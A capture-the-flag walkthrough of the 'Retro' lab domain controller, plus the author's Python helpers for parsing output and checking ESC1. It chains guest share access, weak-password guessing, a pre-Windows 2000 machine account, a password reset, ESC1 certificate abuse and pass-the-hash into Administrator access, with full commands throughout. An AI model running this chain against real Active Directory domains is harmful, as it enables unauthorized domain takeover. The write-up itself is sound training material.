Introduction
Retro starts with an open SMB share holding a note about a trainee account that uses its username as its password. From there, I find an old machine account that still has its pre-Windows 2000 password set. That gives me access to a vulnerable AD CS template, resulting in SYSTEM access.
nmap
nmap finds lots of open TCP ports:
sudo nmap -sC -sV -vv -oA nmap_scan/nmap_results 10.129.186.15
- -sC for default scripts
- -sV to enumerate versions
- -vv for double verbose output
- -oA for output in all formats
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-01-04 15:31:08Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-04T15:32:27+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
<SNIP>
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
<SNIP>
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
<SNIP>
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
<SNIP>
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
<SNIP>
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 36202/tcp): CLEAN (Timeout)
| Check 2 (port 7988/tcp): CLEAN (Timeout)
| Check 3 (port 52836/udp): CLEAN (Timeout)
| Check 4 (port 56120/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2026-01-04T15:31:49
|_ start_date: N/A
Based on the open ports, the box is a Windows Domain Controller. The domain is retro.vl and the DC hostname is DC.
I can generate a hosts file with netexec:
└─$ netexec smb 10.129.186.15 --generate-hosts-file retro.hosts
SMB 10.129.186.15 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
└─$ cat retro.hosts
10.129.186.15 DC.retro.vl retro.vl DC
and add it to /etc/hosts.
SMB - TCP 445
Shares
Using guest authentication, I can list the SMB shares:
└─$ netexec smb 10.129.186.15 -u guest -p '' --shares
SMB 10.129.186.15 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.186.15 445 DC [+] retro.vl\guest:
SMB 10.129.186.15 445 DC [*] Enumerated shares
SMB 10.129.186.15 445 DC Share Permissions Remark
SMB 10.129.186.15 445 DC ----- ----------- ------
SMB 10.129.186.15 445 DC ADMIN$ Remote Admin
SMB 10.129.186.15 445 DC C$ Default share
SMB 10.129.186.15 445 DC IPC$ READ Remote IPC
SMB 10.129.186.15 445 DC NETLOGON Logon server share
SMB 10.129.186.15 445 DC Notes
SMB 10.129.186.15 445 DC SYSVOL Logon server share
SMB 10.129.186.15 445 DC Trainees READ
I have READ permission on the Trainees share, so I check it:
└─$ smbclient //10.129.186.15/Trainees
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 23 17:58:43 2023
.. DHS 0 Wed Jun 11 10:17:10 2025
Important.txt A 288 Sun Jul 23 18:00:13 2023
4659711 blocks of size 4096. 1307728 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (3.0 KiloBytes/sec) (average 3.0 KiloBytes/sec)
There is an Important.txt file, which I download and read:
└─$ cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
Ok, so there should be one account shared by all the trainees. I would guess something like trainee or trainees; to find it I can enumerate users via RID cycling:
└─$ netexec smb 10.129.186.15 -u guest -p '' --rid-brute
SMB 10.129.186.15 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.186.15 445 DC [+] retro.vl\guest:
SMB 10.129.186.15 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.186.15 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.129.186.15 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.129.186.15 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.129.186.15 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.129.186.15 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.129.186.15 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.129.186.15 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.129.186.15 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.129.186.15 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.129.186.15 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.129.186.15 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.129.186.15 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.186.15 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.186.15 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.186.15 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.129.186.15 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.129.186.15 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.186.15 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.186.15 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.186.15 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.186.15 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.129.186.15 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.129.186.15 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.186.15 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.129.186.15 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.129.186.15 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.129.186.15 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.129.186.15 445 DC 1109: RETRO\tblack (SidTypeUser)
And there it is:
1104: RETRO\trainee (SidTypeUser)
Auth as Trainee
The note mentioned trainees struggling to remember strong and unique passwords, so I would expect this account to have a weak and common password. My first guess was the account name itself, and it was:
└─$ netexec smb 10.129.186.15 -u trainee -p trainee
SMB 10.129.186.15 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.186.15 445 DC [+] retro.vl\trainee:trainee
Now I can look at the SMB shares again:
└─$ netexec smb 10.129.186.15 -u trainee -p 'trainee' --shares
SMB 10.129.186.15 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.186.15 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.186.15 445 DC [*] Enumerated shares
SMB 10.129.186.15 445 DC Share Permissions Remark
SMB 10.129.186.15 445 DC ----- ----------- ------
SMB 10.129.186.15 445 DC ADMIN$ Remote Admin
SMB 10.129.186.15 445 DC C$ Default share
SMB 10.129.186.15 445 DC IPC$ READ Remote IPC
SMB 10.129.186.15 445 DC NETLOGON READ Logon server share
SMB 10.129.186.15 445 DC Notes READ
SMB 10.129.186.15 445 DC SYSVOL READ Logon server share
SMB 10.129.186.15 445 DC Trainees READ
I now have READ access to more shares, so I look at the other non-standard share, Notes:
└─$ smbclient //10.129.186.15/Notes -U trainee%trainee
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Apr 8 23:12:49 2025
.. DHS 0 Wed Jun 11 10:17:10 2025
ToDo.txt A 248 Sun Jul 23 18:05:56 2023
user.txt A 32 Tue Apr 8 23:13:01 2025
4659711 blocks of size 4096. 1325268 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (2.7 KiloBytes/sec) (average 2.7 KiloBytes/sec)
smb: \> get user.txt
getting file \user.txt of size 32 as user.txt (0.4 KiloBytes/sec) (average 1.5 KiloBytes/sec)
There are two text files, the flag (user.txt) and ToDo.txt:
└─$ cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
This note references two things. First, the computer account, which will be the 1106: RETRO\BANKING$ (SidTypeUser) I found before. Second, "That one is older than me" most likely points to the infamous pre-Windows 2000 computer account. For more info, read THIS.
TL;DR: these accounts have their password set to the computer name (without the trailing $), in lowercase.
└─$ netexec smb 10.129.186.15 -u 'BANKING$' -p 'banking'
SMB 10.129.186.15 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.186.15 445 DC [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
This confirms it. Even though it looks like a failure, this exact scenario is covered in the article: STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT means I guessed the correct password for a computer account, but the account has never been used to log on yet.
For reference, when I try a wrong password I get STATUS_LOGON_FAILURE instead:
└─$ netexec smb 10.129.186.15 -u 'BANKING$' -p 'test'
SMB 10.129.186.15 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.186.15 445 DC [-] retro.vl\BANKING$:test STATUS_LOGON_FAILURE
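As an added example (my own code, not part of the original writeup or of netexec), the following Python parses rid-brute lines and netexec authentication lines in the formats shown above, picks out the computer accounts, derives the password a pre-Windows 2000 account would have been created with, and labels each authentication result using the two NTSTATUS codes discussed. The sample lines are constructed to match the output above.

```python
import re

# Constructed sample, in the shape of the `netexec smb ... --rid-brute` lines above.
RID_BRUTE_OUTPUT = r"""
SMB 10.129.186.15 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.129.186.15 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.129.186.15 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.129.186.15 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.129.186.15 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.129.186.15 445 DC 1107: RETRO\jburley (SidTypeUser)
"""

# Constructed sample of netexec authentication result lines, as above.
AUTH_OUTPUT = r"""
SMB 10.129.186.15 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.186.15 445 DC [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
SMB 10.129.186.15 445 DC [-] retro.vl\BANKING$:test STATUS_LOGON_FAILURE
"""

RID_LINE = re.compile(r"(?P<rid>\d+): (?P<domain>[^\\]+)\\(?P<name>.+?) \((?P<kind>SidType\w+)\)$")
AUTH_LINE = re.compile(r"\[(?P<mark>[+-])\] (?P<domain>[^\\\s]+)\\(?P<user>[^:\s]+):(?P<pw>\S*)"
                       r"(?:\s+(?P<status>STATUS_\w+))?")


def parse_rid_brute(text):
    """Return (rid, name, sid_type) tuples for every rid-brute result line."""
    out = []
    for line in text.splitlines():
        m = RID_LINE.search(line.rstrip())
        if m:
            out.append((int(m.group("rid")), m.group("name"), m.group("kind")))
    return out


def computer_accounts(entries):
    """Computer accounts show up as SidTypeUser with a sAMAccountName ending in '$'."""
    return [name for _, name, kind in entries if kind == "SidTypeUser" and name.endswith("$")]


def pre2k_password(sam_account_name):
    """Password a computer account gets when created as 'pre-Windows 2000':
    the computer name without the trailing '$', lowercased (as the writeup states)."""
    return sam_account_name.rstrip("$").lower()


def classify_auth(line):
    """Label a netexec auth line using the two NTSTATUS codes seen above."""
    m = AUTH_LINE.search(line)
    if not m:
        return None
    if m.group("mark") == "+":
        return "valid"
    status = m.group("status")
    if status == "STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT":
        # Password is right, but the computer account has never logged on;
        # its password has to be changed before it can be used.
        return "password-correct-never-logged-on"
    if status == "STATUS_LOGON_FAILURE":
        return "wrong-password"
    return f"other:{status}"


def audit(rid_text, auth_text):
    """Tie it together: which computer accounts exist, what password a pre-2000
    account would carry, and how each observed logon attempt should be read."""
    computers = computer_accounts(parse_rid_brute(rid_text))
    candidates = {name: pre2k_password(name) for name in computers}
    results = [(l.strip(), classify_auth(l)) for l in auth_text.splitlines() if l.strip()]
    return candidates, results


if __name__ == "__main__":
    cands, res = audit(RID_BRUTE_OUTPUT, AUTH_OUTPUT)
    for name, pw in cands.items():
        print(f"{name}: pre-2000 password would be {pw!r}")
    for line, label in res:
        print(f"{label:35} {line}")
```

The same distinction between the two status codes is what makes a pre-created account stand out in authentication logs: a correct password that is rejected with STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT is an account nobody has ever joined to the domain.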
With the password confirmed, I can change it to be able to use the account further:
└─$ impacket-changepasswd -p rpc-samr 'retro.vl/BANKING$:banking@dc.retro.vl' -newpass Password123
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.
Shell as Administrator
SMB gives me nothing new, so I will try AD CS certificate templates.
I will search for any vulnerable templates:
└─$ certipy-ad find -u 'BANKING$@retro.vl' -p Password123 -vulnerable -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: RETRO.VL.
[!] Use -debug to print a stacktrace
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The DNS query name does not exist: DC.retro.vl.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'retro-DC-CA'
[*] Checking web enrollment for CA 'retro-DC-CA' @ 'DC.retro.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Template Created : 2023-07-23T21:17:47+00:00
Template Last Modified : 2023-07-23T21:18:39+00:00
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Full Control Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Property Enroll : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
[+] User Enrollable Principals : RETRO.VL\Domain Computers
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
It returns the RetroClients template with an ESC1 vulnerability.
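To make the ESC1 preconditions explicit, here is an added Python example (my own code, not part of the original writeup or of Certipy) that parses a template block in the text layout Certipy printed above and evaluates each condition, and also reports the minimum RSA key length the template enforces. The RetroClients text is copied from the output above; the hardened variant and the set of principals treated as low-privileged are my assumptions for illustration.

```python
# Constructed sample: the RetroClients template block in the layout Certipy printed above.
RETROCLIENTS = r"""
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Full Control Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
"""

# Assumed hardened variant (my construction): the enrollee no longer supplies the
# subject and manager approval is required; everything else is unchanged.
HARDENED = (RETROCLIENTS
            .replace("Enrollee Supplies Subject : True", "Enrollee Supplies Subject : False")
            .replace("Requires Manager Approval : False", "Requires Manager Approval : True"))

SECTION_HEADERS = {"Permissions", "Enrollment Permissions", "Object Control Permissions"}
# Assumption for illustration: groups that every ordinary domain account falls under.
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}
# EKUs that let a certificate be used for domain logon (a template with no EKU also qualifies).
LOGON_EKUS = {"Client Authentication", "PKINIT Client Authentication",
              "Smart Card Logon", "Any Purpose"}


def parse_certipy_template(text):
    """Parse 'Key : Value' lines; a line without ' : ' continues the previous key
    (Certipy lists multi-valued fields such as Enrollment Rights that way)."""
    fields, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in SECTION_HEADERS:
            key = None
            continue
        if " : " in line:
            key, _, value = line.partition(" : ")
            key = key.strip()
            fields[key] = [value.strip()]
        elif key is not None:
            fields[key].append(line)
    return fields


def esc1_checks(t):
    """Each ESC1 precondition as a named boolean; the template is ESC1 when all hold."""
    def flag(k):
        return t.get(k, ["False"])[0] == "True"
    ekus = set(t.get("Extended Key Usage", []))
    enrollers = {p.split("\\")[-1] for p in t.get("Enrollment Rights", [])}
    return {
        "template enabled": flag("Enabled"),
        "enrollee supplies subject": flag("Enrollee Supplies Subject"),
        "logon-capable EKU": not ekus or bool(ekus & LOGON_EKUS),
        "no manager approval": not flag("Requires Manager Approval"),
        "no authorized signatures": t.get("Authorized Signatures Required", ["0"])[0] == "0",
        "low-privileged enrollment right": bool(enrollers & LOW_PRIV),
    }


def is_esc1(t):
    return all(esc1_checks(t).values())


def required_key_size(t, default=2048):
    """RSA size a request must use; a smaller key is refused with CERTSRV_E_KEY_LENGTH."""
    return max(default, int(t.get("Minimum RSA Key Length", [str(default)])[0]))


if __name__ == "__main__":
    for label, text in (("RetroClients", RETROCLIENTS), ("hardened", HARDENED)):
        t = parse_certipy_template(text)
        print(f"{label}: ESC1={is_esc1(t)} minimum RSA key={required_key_size(t)}")
        for name, ok in esc1_checks(t).items():
            print(f"  {'x' if ok else '-'} {name}")
```

Turning off Enrollee Supplies Subject or requiring manager approval is enough to break the chain; Domain Computers keeping an enrollment right is by itself fine for a template that only issues certificates for the requesting machine's own identity.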
ESC1
I can use certipy to request a certificate as the BANKING$ account while specifying the UPN of administrator.
This will work because:
- BANKING$ is in Domain Computers, which satisfies the template's enrollment permissions:
Enrollment Permissions
Enrollment Rights: RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
- RetroClients is configured with Enrollee Supplies Subject, so the enrollee can specify which user the certificate is issued for:
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
- The Extended Key Usage field is set to Client Authentication, so the certificate can be used to log on:
Extended Key Usage : Client Authentication
So:
└─$ certipy-ad req -u 'BANKING$@10.129.186.15' -p Password123 -ca retro-DC-CA -template RetroClients -upn administrator@10.129.186.15
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 9
[-] Got error while requesting certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
Would you like to save the private key? (y/N): y
[*] Saving private key to '9.key'
[*] Wrote private key to '9.key'
[-] Failed to request certificate
Oh... CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template. Checking the certipy documentation for the relevant option:
-key-size RSA key length
Length of RSA key (default: 2048)
This should be an easy fix; try double the default value:
└─$ certipy-ad req -u 'BANKING$@10.129.186.15' -p Password123 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 15
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
And it worked.
Now I can use the certificate to authenticate as administrator:
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.186.15
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@retro.vl'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[-] Object SID mismatch between certificate and user 'administrator'
[-] See the wiki for more information
Another error: Object SID mismatch. No big deal, I just need to get the administrator's SID:
└─$ lookupsid.py retro.vl/BANKING$:Password123@10.129.186.15
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at dc.retro.vl
[*] StringBinding ncacn_np:dc.retro.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2983547755-698260136-4283918172
<SNIP>
500: RETRO\Administrator (SidTypeUser)
Request another certificate, this time passing the SID:
└─$ certipy-ad req -u 'BANKING$@10.129.186.15' -p Password123 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096 -sid S-1-5-21-2983547755-698260136-4283918172-500
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 15
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote certificate and private key to 'administrator.pfx'
And finally, authenticate as administrator:
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.186.15
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@retro.vl'
[*] SAN URL SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Security Extension SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
Ok, I have the hash, so I can use it with evil-winrm to log in:
└─$ evil-winrm -i dc.retro.vl -u administrator -H 252fac7066d93dd009d4fd2cd0368389
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Grab the flag and it is done!